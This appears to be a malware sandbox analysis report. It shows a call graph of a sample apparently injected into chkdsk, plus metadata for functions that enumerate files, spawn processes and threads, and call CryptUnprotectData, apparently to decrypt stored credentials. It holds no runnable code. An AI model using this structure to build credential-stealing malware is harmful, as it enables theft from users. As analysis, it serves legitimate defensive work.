502d400 74013->74014 74015 502cabc RtlFreeHeap 74014->74015 74015->73932 74019 502ca60 74016->74019 74018 502e46a 74018->73943 74020 502d400 74019->74020 74021 502ca7c RtlAllocateHeap 74020->74021 74021->74018 74023 502ca60 RtlAllocateHeap 74022->74023 74024 502e428 74023->74024 74024->73963 74026 502c846 74025->74026 74027 502c85c NtReadFile 74026->74027 74027->73964 74029 502e154 74028->74029 74030 502e13d 74028->74030 74029->73973 74030->74029 74031 502e410 RtlAllocateHeap 74030->74031 74032 502e16b 74031->74032 74032->73973 74034 502c80c 74033->74034 74037 5892a10 LdrInitializeThunk 74034->74037 74035 5027332 74035->74011 74037->74035 74039 58929f0 LdrInitializeThunk 74042 50315ad 74045 502ded0 74042->74045 74044 50315b2 74046 502def6 74045->74046 74051 501a0c0 74046->74051 74048 502df02 74049 502df30 74048->74049 74057 50190e0 74048->74057 74049->74044 74054 501a0cd 74051->74054 74079 501a010 74051->74079 74053 501a0d4 74053->74048 74054->74053 74086 501e060 74054->74086 74062 5019107 74057->74062 74058 50193fd 74058->74049 74060 50191c5 74060->74058 74061 502e410 RtlAllocateHeap 74060->74061 74063 50191db 74061->74063 74062->74058 74223 501e2a0 74062->74223 74064 502e410 RtlAllocateHeap 74063->74064 74065 50191e9 74064->74065 74066 502e410 RtlAllocateHeap 74065->74066 74067 50191fa 74066->74067 74068 5027390 7 API calls 74067->74068 74069 5019218 74068->74069 74070 5027390 7 API calls 74069->74070 74071 5019226 74070->74071 74072 5027390 7 API calls 74071->74072 74074 5019243 74071->74074 74072->74074 74073 5027390 7 API calls 74075 5019261 74073->74075 74074->74073 74078 501928c 74074->74078 74075->74078 74233 501d340 74075->74233 74078->74058 74256 5018d60 74078->74256 74081 501a023 74079->74081 74080 501a036 74080->74054 74081->74080 74094 502d780 74081->74094 74083 501a073 74083->74080 74105 5019e50 74083->74105 74085 501a093 74085->74054 74087 501e079 74086->74087 74088 501a0e5 74087->74088 74215 502cc00 74087->74215 74088->74048 74090 501e0b2 74091 501e0dd 74090->74091 74218 502c690 74090->74218 74092 502c8c0 NtClose 74091->74092 74092->74088 74095 502d799 74094->74095 74096 5027390 7 API calls 74095->74096 74097 502d7b1 74096->74097 74098 502d7ba 74097->74098 74111 502d5c0 74097->74111 74098->74083 74100 502d7ce 74100->74098 74124 502c330 74100->74124 74102 502d802 74103 502e330 RtlFreeHeap 74102->74103 74104 502d82c 74103->74104 74104->74083 74194 5017650 74105->74194 74107 5019e71 74107->74085 74108 5019e6a 74108->74107 74207 5017910 74108->74207 74112 502d5db 74111->74112 74113 502d5ed 74112->74113 74114 502e2b0 NtAllocateVirtualMemory 74112->74114 74113->74100 74115 502d60d 74114->74115 74128 50269a0 74115->74128 74117 502d630 74117->74113 74118 50269a0 2 API calls 74117->74118 74120 502d652 74118->74120 74120->74113 74160 5027cf0 74120->74160 74121 502d6da 74171 502c2f0 74121->74171 74123 502d742 74123->74100 74125 502c34c 74124->74125 74191 5892b2a 74125->74191 74126 502c367 74126->74102 74129 50269b1 74128->74129 74130 50269b9 74128->74130 74129->74117 74159 5026c8c 74130->74159 74175 502f4b0 74130->74175 74132 5026a0d 74133 502f4b0 RtlAllocateHeap 74132->74133 74136 5026a18 74133->74136 74134 5026a66 74137 502f4b0 RtlAllocateHeap 74134->74137 74136->74134 74138 502f5e0 2 API calls 74136->74138 74189 502f550 RtlAllocateHeap RtlFreeHeap 74136->74189 74140 5026a7a 74137->74140 74138->74136 74139 5026ad7 74141 502f4b0 RtlAllocateHeap 74139->74141 74140->74139 74180 502f5e0 74140->74180 74143 5026aed 74141->74143 74144 5026b2a 74143->74144 74146 502f5e0 2 API calls 74143->74146 74145 502f4b0 RtlAllocateHeap 74144->74145 74147 5026b35 74145->74147 74146->74143 74148 5026b6f 74147->74148 74149 502f5e0 2 API calls 74147->74149 74186 502f510 74148->74186 74149->74147 74152 502f510 RtlFreeHeap 74153 5026c6e 74152->74153 74154 502f510 RtlFreeHeap 74153->74154 74155 5026c78 74154->74155 74156 502f510 RtlFreeHeap 74155->74156 74157 5026c82 74156->74157 74158 502f510 RtlFreeHeap 74157->74158 74158->74159 74159->74117 74161 5027d01 74160->74161 74162 5027390 7 API calls 74161->74162 74167 5027d17 74162->74167 74163 5027d20 74163->74121 74164 5027d57 74165 502e330 RtlFreeHeap 74164->74165 74166 5027d68 74165->74166 74166->74121 74167->74163 74167->74164 74168 5027da3 74167->74168 74169 502e330 RtlFreeHeap 74168->74169 74170 5027da8 74169->74170 74170->74121 74172 502c30c 74171->74172 74190 5892d10 LdrInitializeThunk 74172->74190 74173 502c323 74173->74123 74176 502f4c0 74175->74176 74177 502f4c6 74175->74177 74176->74132 74178 502e410 RtlAllocateHeap 74177->74178 74179 502f4ec 74178->74179 74179->74132 74181 502f550 74180->74181 74182 502f5ad 74181->74182 74183 502e410 RtlAllocateHeap 74181->74183 74182->74140 74184 502f58a 74183->74184 74185 502e330 RtlFreeHeap 74184->74185 74185->74182 74187 502e330 RtlFreeHeap 74186->74187 74188 5026c64 74187->74188 74188->74152 74189->74136 74190->74173 74192 5892b3f LdrInitializeThunk 74191->74192 74193 5892b31 74191->74193 74192->74126 74193->74126 74195 5017660 74194->74195 74196 501765b 74194->74196 74197 502e2b0 NtAllocateVirtualMemory 74195->74197 74196->74108 74206 5017685 74197->74206 74198 50176e8 74198->74108 74199 502c2f0 LdrInitializeThunk 74199->74206 74200 50176ee 74202 5017714 74200->74202 74203 502c9f0 LdrInitializeThunk 74200->74203 74202->74108 74204 5017705 74203->74204 74204->74108 74205 502e2b0 NtAllocateVirtualMemory 74205->74206 74206->74198 74206->74199 74206->74200 74206->74205 74210 502c9f0 74206->74210 74208 502c9f0 LdrInitializeThunk 74207->74208 74209 501792e 74208->74209 74209->74085 74211 502ca0c 74210->74211 74214 5892b90 LdrInitializeThunk 74211->74214 74212 502ca23 74212->74206 74214->74212 74216 502d400 74215->74216 74217 502cc1f LookupPrivilegeValueW 74216->74217 74217->74090 74219 502c6a6 74218->74219 74222 5892dc0 LdrInitializeThunk 74219->74222 74220 502c6cb 74220->74091 74222->74220 74224 501e2cc 74223->74224 74271 501e170 74224->74271 74227 501e311 74229 501e322 74227->74229 74232 502c8c0 NtClose 74227->74232 74228 501e2f9 74230 501e304 74228->74230 74231 502c8c0 NtClose 74228->74231 74229->74060 74230->74060 74231->74230 74232->74229 74234 501d365 74233->74234 74235 501cce0 2 API calls 74234->74235 74236 501d377 74234->74236 74235->74236 74237 501d45d 74236->74237 74282 501cf20 74236->74282 74237->74078 74239 501d3dc 74241 501d3e3 74239->74241 74297 501cda0 74239->74297 74241->74078 74243 502c8c0 NtClose 74248 501d498 74243->74248 74244 501cf20 3 API calls 74245 501d52c 74244->74245 74249 501d533 74245->74249 74301 501d0f0 74245->74301 74247 501d56d 74247->74078 74250 501cda0 LdrInitializeThunk 74248->74250 74249->74078 74251 501d4d2 74250->74251 74252 502c8c0 NtClose 74251->74252 74253 501d4dc 74252->74253 74254 501cda0 LdrInitializeThunk 74253->74254 74255 501d516 74254->74255 74255->74244 74346 501e560 74256->74346 74258 5018d7a 74267 50190d1 74258->74267 74350 5026cd0 74258->74350 74260 5018dd6 74261 502f4b0 RtlAllocateHeap 74260->74261 74260->74267 74262 5018f6f 74261->74262 74263 502f5e0 2 API calls 74262->74263 74269 5018f84 74263->74269 74264 5017650 3 API calls 74264->74269 74267->74058 74269->74264 74269->74267 74270 5017910 LdrInitializeThunk 74269->74270 74353 501c5b0 74269->74353 74386 501e500 74269->74386 74390 501df60 74269->74390 74270->74269 74272 501e240 74271->74272 74273 501e18a 74271->74273 74272->74227 74272->74228 74277 502c3b0 74273->74277 74276 502c8c0 NtClose 74276->74272 74278 502c3cc 74277->74278 74281 58934e0 LdrInitializeThunk 74278->74281 74279 501e234 74279->74276 74281->74279 74283 501cf4c 74282->74283 74284 501cda0 LdrInitializeThunk 74283->74284 74285 501cf96 74284->74285 74286 501d038 74285->74286 74327 502c5d0 74285->74327 74286->74239 74288 501cfbd 74289 501d02f 74288->74289 74291 501d044 74288->74291 74292 502c5d0 LdrInitializeThunk 74288->74292 74290 502c8c0 NtClose 74289->74290 74290->74286 74293 502c8c0 NtClose 74291->74293 74292->74288 74294 501d04d 74293->74294 74295 501cda0 LdrInitializeThunk 74294->74295 74296 501d06a 74294->74296 74295->74296 74296->74239 74298 501cdc5 74297->74298 74332 502c4c0 74298->74332 74302 501d115 74301->74302 74303 501cce0 2 API calls 74302->74303 74305 501d123 74302->74305 74303->74305 74304 501d335 74304->74247 74305->74304 74306 501d2b6 74305->74306 74308 501cda0 LdrInitializeThunk 74305->74308 74307 501cda0 LdrInitializeThunk 74306->74307 74309 501d2f0 74307->74309 74310 501d201 74308->74310 74337 501ce50 74309->74337 74310->74306 74312 501d20c 74310->74312 74313 502c8c0 NtClose 74312->74313 74316 501d216 74313->74316 74314 502c8c0 NtClose 74314->74304 74315 501d300 74315->74314 74317 501cda0 LdrInitializeThunk 74316->74317 74318 501d250 74317->74318 74319 502c8c0 NtClose 74318->74319 74320 501d25a 74319->74320 74321 501cda0 LdrInitializeThunk 74320->74321 74322 501d294 74321->74322 74323 501ce50 LdrInitializeThunk 74322->74323 74324 501d2a4 74323->74324 74325 502c8c0 NtClose 74324->74325 74326 501d2ae 74325->74326 74326->74247 74328 502c5ec 74327->74328 74331 5892ac0 LdrInitializeThunk 74328->74331 74329 502c60b 74329->74288 74331->74329 74333 502c4dc 74332->74333 74336 5892b80 LdrInitializeThunk 74333->74336 74334 501ce39 74334->74243 74334->74255 74336->74334 74338 501ce76 74337->74338 74341 502c510 74338->74341 74342 502c52c 74341->74342 74345 5892fb0 LdrInitializeThunk 74342->74345 74343 501cf04 74343->74315 74345->74343 74347 501e56d 74346->74347 74348 501e593 74347->74348 74349 501e58c SetErrorMode 74347->74349 74348->74258 74349->74348 74402 501e330 74350->74402 74352 5026cf6 74352->74260 74354 501c5c9 74353->74354 74357 501c5cf 74353->74357 74419 501dc30 74354->74419 74426 5019ba0 74357->74426 74358 501c5dc 74359 502f5e0 2 API calls 74358->74359 74381 501c70d 74358->74381 74360 501c5f5 74359->74360 74361 501e500 LdrInitializeThunk 74360->74361 74363 501c609 74360->74363 74361->74363 74362 501c730 74435 501c550 LdrInitializeThunk 74362->74435 74363->74362 74364 502c330 LdrInitializeThunk 74363->74364 74363->74381 74365 501c687 74364->74365 74365->74362 74370 501c693 74365->74370 74367 501c74f 74368 501c757 74367->74368 74436 501c4c0 NtClose LdrInitializeThunk 74367->74436 74369 502c8c0 NtClose 74368->74369 74373 501c761 74369->74373 74371 501c6d9 74370->74371 74374 502c440 LdrInitializeThunk 74370->74374 74370->74381 74376 502c8c0 NtClose 74371->74376 74373->74269 74374->74371 74375 501c779 74375->74368 74377 501c780 74375->74377 74378 501c6f6 74376->74378 74382 501c798 74377->74382 74437 501c440 74377->74437 74432 502b7a0 74378->74432 74381->74269 74383 502c8c0 NtClose 74382->74383 74384 501c829 74383->74384 74385 502c8c0 NtClose 74384->74385 74385->74381 74387 501e513 74386->74387 74451 502c2c0 74387->74451 74391 501df97 74390->74391 74392 501df77 74390->74392 74397 501dfd6 74391->74397 74476 501dbb0 74391->74476 74392->74391 74456 501dd70 74392->74456 74398 501e005 74397->74398 74494 501d580 10 API calls 74397->74494 74398->74269 74401 5027390 7 API calls 74401->74397 74403 501e34d 74402->74403 74409 502c3f0 74403->74409 74405 501e395 74405->74352 74410 502c40c 74409->74410 74417 5892e50 LdrInitializeThunk 74410->74417 74411 501e38e 74411->74405 74413 502c440 74411->74413 74414 502c45c 74413->74414 74418 5892c30 LdrInitializeThunk 74414->74418 74415 501e3be 74415->74352 74417->74411 74418->74415 74440 501d600 74419->74440 74421 502e410 RtlAllocateHeap 74422 501dd61 74421->74422 74422->74357 74423 501dc4e 74425 501dd52 74423->74425 74447 502b620 74423->74447 74425->74421 74427 5019bb8 74426->74427 74428 501e170 2 API calls 74427->74428 74431 5019cd1 74427->74431 74429 5019cbc 74428->74429 74430 502c8c0 NtClose 74429->74430 74429->74431 74430->74431 74431->74358 74433 501e500 LdrInitializeThunk 74432->74433 74434 502b7d2 74432->74434 74433->74434 74434->74381 74435->74367 74436->74375 74438 502c440 LdrInitializeThunk 74437->74438 74439 501c47b 74438->74439 74439->74382 74441 501d633 74440->74441 74442 501e330 2 API calls 74441->74442 74443 501d685 74442->74443 74444 501d68c 74443->74444 74445 502e450 RtlAllocateHeap 74443->74445 74444->74423 74446 501d69c 74445->74446 74446->74423 74448 502b62f 74447->74448 74449 502b66d 74448->74449 74450 502b65a CreateThread 74448->74450 74449->74425 74450->74425 74452 502c2dc 74451->74452 74455 5892cf0 LdrInitializeThunk 74452->74455 74453 501e53e 74453->74269 74455->74453 74457 501dda0 74456->74457 74495 50266c0 74457->74495 74459 501ddee 74516 5025530 74459->74516 74461 501ddf4 74545 5022330 74461->74545 74463 501ddfa 74564 50245a0 74463->74564 74469 501de0e 74599 5025dd0 74469->74599 74471 501de14 74603 501fc70 74471->74603 74473 501de2c 74615 5020f10 74473->74615 74477 501dbc8 74476->74477 74481 501dc1f 74476->74481 74478 5021150 7 API calls 74477->74478 74477->74481 74479 501dc09 74478->74479 74479->74481 74809 50213a0 74479->74809 74481->74398 74482 501da00 74481->74482 74483 501da1c 74482->74483 74493 501da66 74482->74493 74486 502c8c0 NtClose 74483->74486 74483->74493 74484 501db85 74485 501db9f 74484->74485 74487 5027390 7 API calls 74484->74487 74485->74397 74485->74401 74488 501da34 74486->74488 74487->74485 74491 501cf20 3 API calls 74488->74491 74489 501cf20 3 API calls 74490 501db5f 74489->74490 74490->74484 74492 501d0f0 4 API calls 74490->74492 74491->74493 74492->74484 74493->74484 74493->74489 74494->74398 74496 50266e8 74495->74496 74497 501cce0 2 API calls 74496->74497 74499 502672f 74497->74499 74498 5026736 74498->74459 74499->74498 74500 501cda0 LdrInitializeThunk 74499->74500 74501 50267a6 74500->74501 74503 50267e8 74501->74503 74513 502696b 74501->74513 74620 5026410 NtClose LdrInitializeThunk LdrInitializeThunk 74501->74620 74504 501cda0 LdrInitializeThunk 74503->74504 74508 502682c 74504->74508 74505 5026872 74506 501cda0 LdrInitializeThunk 74505->74506 74510 50268a2 74506->74510 74508->74505 74508->74513 74621 5026410 NtClose LdrInitializeThunk LdrInitializeThunk 74508->74621 74509 50268e8 74512 501cda0 LdrInitializeThunk 74509->74512 74510->74509 74510->74513 74622 5026410 NtClose LdrInitializeThunk LdrInitializeThunk 74510->74622 74514 5026947 74512->74514 74513->74459 74514->74513 74623 5026410 NtClose LdrInitializeThunk LdrInitializeThunk 74514->74623 74517 5025594 74516->74517 74518 501cce0 2 API calls 74517->74518 74520 5025694 74518->74520 74519 502569b 74519->74461 74520->74519 74521 501cda0 LdrInitializeThunk 74520->74521 74523 5025703 74521->74523 74522 5025823 74522->74461 74523->74522 74524 5025832 74523->74524 74624 5025320 74523->74624 74525 502c8c0 NtClose 74524->74525 74527 502583c 74525->74527 74527->74461 74528 5025738 74528->74524 74529 5025743 74528->74529 74530 502e410 RtlAllocateHeap 74529->74530 74531 502576c 74530->74531 74532 5025775 74531->74532 74533 502578b 74531->74533 74535 502c8c0 NtClose 74532->74535 74633 5025210 CoInitialize 74533->74633 74537 502577f 74535->74537 74536 5025799 74538 502c5d0 LdrInitializeThunk 74536->74538 74537->74461 74543 50257b7 74538->74543 74539 5025812 74540 502c8c0 NtClose 74539->74540 74541 502581c 74540->74541 74542 502e330 RtlFreeHeap 74541->74542 74542->74522 74543->74539 74544 502c5d0 LdrInitializeThunk 74543->74544 74544->74543 74546 5022358 74545->74546 74547 502e410 RtlAllocateHeap 74546->74547 74549 50223b8 74547->74549 74548 50223c1 74548->74463 74549->74548 74635 5021790 74549->74635 74551 50223ea 74555 5022428 74551->74555 74659 50240a0 GetFileAttributesW GetFileAttributesW 74551->74659 74553 502241c 74660 50240a0 GetFileAttributesW GetFileAttributesW 74553->74660 74556 5021790 9 API calls 74555->74556 74560 502246f 74556->74560 74557 50224ae 74559 502e330 RtlFreeHeap 74557->74559 74562 50224d2 74559->74562 74560->74557 74661 50240a0 GetFileAttributesW GetFileAttributesW 74560->74661 74561 50224a2 74662 50240a0 GetFileAttributesW GetFileAttributesW 74561->74662 74562->74463 74565 50245c6 74564->74565 74674 501e760 74565->74674 74568 5024705 74569 501de02 74568->74569 74678 5011520 74568->74678 74683 50242b0 74568->74683 74571 5025850 74569->74571 74572 50245a0 10 API calls 74571->74572 74573 501de08 74572->74573 74574 50232c0 74573->74574 74575 50232e2 74574->74575 74738 5023180 74575->74738 74578 5023180 10 API calls 74579 502354b 74578->74579 74580 5023180 10 API calls 74579->74580 74581 5023563 74580->74581 74582 5023180 10 API calls 74581->74582 74583 502357b 74582->74583 74584 5023180 10 API calls 74583->74584 74585 5023593 74584->74585 74586 5023180 10 API calls 74585->74586 74588 50235ae 74586->74588 74587 50235c8 74587->74469 74588->74587 74589 5023180 10 API calls 74588->74589 74590 50235fc 74589->74590 74591 5023180 10 API calls 74590->74591 74592 5023639 74591->74592 74593 5023180 10 API calls 74592->74593 74594 5023676 74593->74594 74595 5023180 10 API calls 74594->74595 74596 50236b3 74595->74596 74597 5023180 10 API calls 74596->74597 74598 50236f0 74597->74598 74598->74469 74600 5025ded 74599->74600 74601 501b130 LdrLoadDll 74600->74601 74602 5025e08 74601->74602 74602->74471 74604 501fc86 74603->74604 74613 501fc91 74603->74613 74605 502e410 RtlAllocateHeap 74604->74605 74605->74613 74606 501fca7 74606->74473 74607 501fd8c GetFileAttributesW 74607->74613 74608 501ff0f 74609 501ff28 74608->74609 74610 502e330 RtlFreeHeap 74608->74610 74609->74473 74610->74609 74611 5011520 GetFileAttributesW 74611->74613 74613->74606 74613->74607 74613->74608 74613->74611 74614 5023700 7 API calls 74613->74614 74747 502aac0 74613->74747 74614->74613 74751 5020c90 74615->74751 74617 5020f1d 74768 5020970 74617->74768 74619 501de3e 74619->74391 74620->74503 74621->74505 74622->74509 74623->74513 74625 502533c 74624->74625 74626 501b130 LdrLoadDll 74625->74626 74628 5025357 74626->74628 74627 5025360 74627->74528 74628->74627 74629 501b130 LdrLoadDll 74628->74629 74630 502542b 74629->74630 74631 501b130 LdrLoadDll 74630->74631 74632 5025484 74630->74632 74631->74632 74632->74528 74634 5025275 74633->74634 74634->74536 74636 5021828 74635->74636 74637 501cda0 LdrInitializeThunk 74636->74637 74638 5021906 74637->74638 74639 5021a4d 74638->74639 74669 502c550 74638->74669 74640 5021a5e 74639->74640 74663 5021150 74639->74663 74640->74551 74644 5021a43 74645 502c8c0 NtClose 74644->74645 74645->74639 74646 502193f 74647 502c8c0 NtClose 74646->74647 74648 5021979 74647->74648 74648->74640 74649 501cda0 LdrInitializeThunk 74648->74649 74650 50219d5 74649->74650 74650->74640 74651 502c550 LdrInitializeThunk 74650->74651 74652 50219fa 74651->74652 74653 5021a01 74652->74653 74654 5021a2d 74652->74654 74655 502c8c0 NtClose 74653->74655 74656 502c8c0 NtClose 74654->74656 74657 5021a0b 74655->74657 74658 5021a37 74656->74658 74657->74551 74658->74551 74659->74553 74660->74555 74661->74561 74662->74557 74664 5021175 74663->74664 74665 5027390 7 API calls 74664->74665 74667 50212a7 74665->74667 74666 5021361 74666->74640 74667->74666 74668 5027390 7 API calls 74667->74668 74668->74666 74670 502c56c 74669->74670 74673 5892b00 LdrInitializeThunk 74670->74673 74671 5021934 74671->74644 74671->74646 74673->74671 74675 501e77f 74674->74675 74676 501e786 GetFileAttributesW 74675->74676 74677 501e791 74675->74677 74676->74677 74677->74568 74679 501157a 74678->74679 74680 50115d5 74679->74680 74700 501e7a0 74679->74700 74680->74568 74682 5011593 74682->74568 74704 502ac20 74683->74704 74685 5024318 74685->74568 74686 50242c6 74686->74685 74687 50242e5 74686->74687 74692 5024324 74686->74692 74688 5024307 74687->74688 74689 50242ed 74687->74689 74691 502e330 RtlFreeHeap 74688->74691 74690 502e330 RtlFreeHeap 74689->74690 74693 50242fb 74690->74693 74691->74685 74694 5027390 7 API calls 74692->74694 74693->74568 74695 502434c 74694->74695 74724 5023700 74695->74724 74697 502e330 RtlFreeHeap 74698 5024563 74697->74698 74698->74568 74699 5024357 74699->74697 74701 501e77d 74700->74701 74702 501e786 GetFileAttributesW 74701->74702 74703 501e791 74701->74703 74702->74703 74703->74682 74705 502ac2e 74704->74705 74706 502ac35 74704->74706 74705->74686 74707 501b130 LdrLoadDll 74706->74707 74708 502ac67 74707->74708 74709 502ac76 74708->74709 74735 502a710 LdrLoadDll 74708->74735 74711 502e410 RtlAllocateHeap 74709->74711 74720 502ae29 74709->74720 74712 502ac8f 74711->74712 74713 502aca4 74712->74713 74714 502ae08 74712->74714 74712->74720 74736 50237e0 LdrLoadDll 74713->74736 74715 502ae12 74714->74715 74716 502aeab 74714->74716 74737 50237e0 LdrLoadDll 74715->74737 74719 502e330 RtlFreeHeap 74716->74719 74719->74720 74720->74686 74721 502acbb 74721->74720 74722 502e330 RtlFreeHeap 74721->74722 74723 502adfc 74722->74723 74723->74686 74725 502370f 74724->74725 74726 5027390 7 API calls 74725->74726 74727 5023716 74726->74727 74728 5023720 74727->74728 74729 5027390 7 API calls 74727->74729 74728->74699 74730 5023731 74729->74730 74730->74728 74731 5027390 7 API calls 74730->74731 74732 502374c 74731->74732 74733 502e330 RtlFreeHeap 74732->74733 74734 5023759 74733->74734 74734->74699 74735->74709 74736->74721 74737->74720 74739 50231a9 74738->74739 74740 50232ac 74739->74740 74741 5023250 FindFirstFileW 74739->74741 74740->74578 74741->74740 74745 502326b 74741->74745 74742 5023293 FindNextFileW 74744 50232a5 FindClose 74742->74744 74742->74745 74744->74740 74745->74742 74746 5023060 7 API calls 74745->74746 74746->74745 74748 502aad6 74747->74748 74750 502abd6 74747->74750 74749 5027390 7 API calls 74748->74749 74748->74750 74749->74748 74750->74613 74752 5020cb5 74751->74752 74753 501e760 GetFileAttributesW 74752->74753 74754 5020daf 74753->74754 74755 5020db6 74754->74755 74756 502ac20 3 API calls 74754->74756 74755->74617 74759 5020dc4 74756->74759 74757 5020dcd 74757->74617 74758 5011520 GetFileAttributesW 74758->74759 74759->74757 74759->74758 74760 502aac0 7 API calls 74759->74760 74763 5020ea1 74759->74763 74781 50203d0 74759->74781 74760->74759 74762 5011520 GetFileAttributesW 74762->74763 74763->74762 74764 5020ef9 74763->74764 74792 5020730 74763->74792 74766 502e330 RtlFreeHeap 74764->74766 74767 5020f00 74766->74767 74767->74617 74769 5020986 74768->74769 74772 5020991 74768->74772 74770 502e410 RtlAllocateHeap 74769->74770 74770->74772 74771 50209a7 74771->74619 74772->74771 74773 501e760 GetFileAttributesW 74772->74773 74774 5020c60 74772->74774 74777 5011520 GetFileAttributesW 74772->74777 74778 502aac0 7 API calls 74772->74778 74779 50203d0 9 API calls 74772->74779 74780 5020730 7 API calls 74772->74780 74773->74772 74775 5020c79 74774->74775 74776 502e330 RtlFreeHeap 74774->74776 74775->74619 74776->74775 74777->74772 74778->74772 74779->74772 74780->74772 74782 50203f6 74781->74782 74783 5027390 7 API calls 74782->74783 74784 5020452 74783->74784 74785 5023700 7 API calls 74784->74785 74786 502045d 74785->74786 74788 50205e0 74786->74788 74790 502047b 74786->74790 74787 50205c5 74787->74759 74788->74787 74789 50202a0 9 API calls 74788->74789 74789->74788 74790->74787 74798 50202a0 74790->74798 74793 5020756 74792->74793 74794 5027390 7 API calls 74793->74794 74795 50207c7 74794->74795 74796 5023700 7 API calls 74795->74796 74797 50207d2 74796->74797 74797->74763 74799 50202b6 74798->74799 74802 5023b70 74799->74802 74801 50203be 74801->74790 74803 5023bad 74802->74803 74804 5023c5d 74803->74804 74805 5024b40 9 API calls 74803->74805 74806 5023c00 74803->74806 74804->74801 74805->74806 74807 5023c39 74806->74807 74808 502e330 RtlFreeHeap 74806->74808 74807->74801 74808->74807 74810 50213c6 74809->74810 74811 502177f 74810->74811 74812 5027390 7 API calls 74810->74812 74811->74481 74813 5021432 74812->74813 74813->74811 74847 502cb10 74813->74847 74815 5021468 74816 5021767 74815->74816 74817 502f5e0 2 API calls 74815->74817 74818 502e330 RtlFreeHeap 74816->74818 74819 5021484 74817->74819 74818->74811 74819->74816 74820 5021587 74819->74820 74821 502c330 LdrInitializeThunk 74819->74821 74850 501c550 LdrInitializeThunk 74820->74850 74822 5021508 74821->74822 74822->74820 74828 5021510 74822->74828 74824 50215b2 74824->74816 74829 50215e7 74824->74829 74833 501c440 LdrInitializeThunk 74824->74833 74825 502156d 74826 502e330 RtlFreeHeap 74825->74826 74831 502157d 74826->74831 74827 502153c 74830 502c8c0 NtClose 74827->74830 74828->74811 74828->74825 74828->74827 74832 501c440 LdrInitializeThunk 74828->74832 74836 5021746 74829->74836 74839 5021617 74829->74839 74834 502154c 74830->74834 74831->74481 74832->74827 74833->74829 74835 502b7a0 LdrInitializeThunk 74834->74835 74835->74825 74837 502e330 RtlFreeHeap 74836->74837 74838 502175d 74837->74838 74838->74481 74840 501e330 2 API calls 74839->74840 74841 502169b 74840->74841 74841->74816 74842 50216a6 74841->74842 74843 502e330 RtlFreeHeap 74842->74843 74844 50216ca 74843->74844 74845 502c440 LdrInitializeThunk 74844->74845 74846 5021705 74845->74846 74846->74481 74848 502d400 74847->74848 74849 502cb2f CreateProcessInternalW 74848->74849 74849->74815 74850->74824

                                                                                                                    Executed Functions

                                                                                                                    Function 05023180 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,00000000), ref: 05023261
                                                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 0502329E
                                                                                                                    • FindClose.KERNEL32(?), ref: 050232A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    • Opcode ID: 64022c44cc39ceb07b806c97179740301f8dba5168e517bbb524cd4eabc5d6df
                                                                                                                    • Instruction ID: 8a5dee1fc1fd3e7a8f04ad879d0bba32dc331ae01cb4163877dc15f2d5f16c0d
                                                                                                                    • Opcode Fuzzy Hash: 64022c44cc39ceb07b806c97179740301f8dba5168e517bbb524cd4eabc5d6df
                                                                                                                    • Instruction Fuzzy Hash: BD318871A00259BBEB20DFA4DC89FFF77BCEF54701F144558B909A7180E674AA44CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05024B40 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 173encryptionCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,05024032), ref: 05024BCD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 834300711-3916222277
                                                                                                                    • Opcode ID: a8710cb9ee23cc4c7cfd635e1d26fc8a87ed66630732a292571e2872a0be6e3d
                                                                                                                    • Instruction ID: 3648a0623c94ae7c9ab46b481088e4897d281f96c7db8061898f37c69288b1ef
                                                                                                                    • Opcode Fuzzy Hash: a8710cb9ee23cc4c7cfd635e1d26fc8a87ed66630732a292571e2872a0be6e3d
                                                                                                                    • Instruction Fuzzy Hash: 7F515772D04269AFDF11DFA8EC84AEEB7BDBF58210F040569E61DE3140E7356A44CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0502C7E2 Relevance: 1.6, APIs: 1, Instructions: 76filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(050276C0,05022B88,FFFFFFFF,050271B3,00000002,?,050276C0,00000002,050271B3,FFFFFFFF,05022B88,050276C0,00000002,00000000), ref: 0502C885
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7439457732.0000000005010000.00000040.80000000.00040000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5010000_chkdsk.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 66092ef471fd4a6572e15ed4b08ea9e60bf3a77c7dc14c99d440f23edb7bef11
                                                                                                                    • Instruction ID: 735e321eb8354d55e03a8116693002fff5f268081e4f0f250e816991c6334570
                                                                                                                    • Opcode Fuzzy Hash: 66092ef471fd4a6572e15ed4b08ea9e60bf3a77c7dc14c99d440f23edb7bef11
                                                                                                                    • Instruction Fuzzy Hash: 3F21C9B6200108AFCB14DF99DC84DEB77A9EF8C754F158659FA0DA7241D635EC12CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

